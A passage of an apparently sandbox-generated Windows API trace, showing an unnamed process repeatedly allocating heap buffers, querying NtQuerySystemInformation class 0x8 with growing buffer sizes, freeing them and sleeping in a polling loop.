SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0259.500] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0259.500] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0259.500] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0259.500] Sleep (dwMilliseconds=0x110) [0259.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0259.547] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0259.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0259.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0259.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0259.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0259.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0259.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0259.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0259.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0259.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0259.550] Sleep (dwMilliseconds=0x110) [0259.571] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0259.571] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.572] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0259.572] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0259.572] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.572] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0259.572] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0259.572] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.573] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0259.573] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0259.573] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0259.574] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0259.574] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0259.574] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0259.574] Sleep (dwMilliseconds=0x110) [0259.592] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0259.592] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0259.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0259.593] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0259.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0259.593] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.594] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0259.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0259.594] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0259.594] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0259.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0259.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0259.595] Sleep (dwMilliseconds=0x110) [0259.619] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0259.619] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.619] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0259.619] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0259.619] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.620] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0259.620] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0259.620] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.621] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0259.621] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0259.621] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0259.621] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0259.621] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0259.622] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0259.622] Sleep (dwMilliseconds=0x110) [0259.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0259.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0259.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0259.640] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0259.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0259.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0259.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0259.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0259.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0259.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0259.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0259.642] Sleep (dwMilliseconds=0x110) [0259.666] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0259.666] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.666] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0259.666] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0259.666] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.667] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0259.667] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0259.667] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.667] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0259.667] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0259.667] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0259.668] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0259.668] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0259.669] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0259.670] Sleep (dwMilliseconds=0x110) [0259.696] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0259.696] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.696] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0259.696] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0259.696] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.697] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0259.697] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0259.697] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.697] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0259.697] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0259.697] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0259.698] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0259.698] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0259.698] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0259.698] Sleep (dwMilliseconds=0x110) [0259.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0259.702] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0259.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0259.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0259.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0259.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0259.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0259.704] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0259.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0259.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0259.705] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0259.705] Sleep (dwMilliseconds=0x110) [0259.726] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0259.726] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.727] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0259.727] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0259.727] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.728] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0259.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0259.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0259.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0259.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0259.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0259.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0259.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0259.734] Sleep (dwMilliseconds=0x110) [0259.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0259.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0259.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0259.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0259.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0259.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0259.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0259.769] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0259.770] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0259.770] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0259.770] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0259.770] Sleep (dwMilliseconds=0x110) [0259.781] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0259.781] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0259.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0259.782] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0259.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0259.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0259.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0259.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0259.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0259.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0259.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0259.784] Sleep (dwMilliseconds=0x110) [0259.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0259.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0259.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0259.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0259.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0259.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0259.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0259.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0259.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0259.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0259.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0259.801] Sleep (dwMilliseconds=0x110) [0259.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0259.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0259.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0259.815] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0259.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0259.815] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.816] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0259.816] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0259.816] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0259.816] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0259.816] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0259.817] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0259.817] Sleep (dwMilliseconds=0x110) [0259.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0259.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0259.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0259.829] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0259.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0259.829] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0259.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0259.830] 